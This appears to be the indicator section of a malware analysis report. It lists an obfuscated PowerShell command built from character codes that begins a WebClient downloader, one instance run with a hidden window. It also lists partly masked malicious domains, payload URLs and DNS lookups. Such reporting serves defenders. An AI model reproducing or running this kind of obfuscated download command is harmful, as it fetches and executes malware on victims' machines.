Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -joIN (( 31 , 84 , 87 , 65,6, 85, 94 ,76 ,22, 84 ,89,81 , 94 ,88 ,79 ,27,117 , 94, 79, 21 ,108 ,94, 89 ,120 , 87, 82, 94 , 85,79, 0 , 31,110 , 125,72,6,28 ,83 ,79 , 79 ,75 , 1 , 20 ,20 , 76 ,76...
- 'ep###usicla.com':80
- 'ep###usicla.com':443
- 'sa#####ikasetpan.com':80
- 'sa#####ikasetpan.com':443
- http://www.ep###usicla.com/R8SeKMT4/
- http://sa#####ikasetpan.com/Jbh1k/
- 'ep###usicla.com':443
- 'sa#####ikasetpan.com':443
- DNS ASK ep###usicla.com
- DNS ASK em#######nternationalschool.com
- DNS ASK so####mgiasi.com
- DNS ASK si####oimoveis.com
- DNS ASK sa#####ikasetpan.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -joIN (( 31 , 84 , 87 , 65,6, 85, 94 ,76 ,22, 84 ,89,81 , 94 ,88 ,79 ,27,117 , 94, 79, 21 ,108 ,94, 89 ,120 , 87, 82, 94 , 85,79, 0 , 31,110 , 125,72,6,28 ,83 ,79 , 79 ,75 , 1 , 20 ,20 , 76 ,76...' (with hidden window)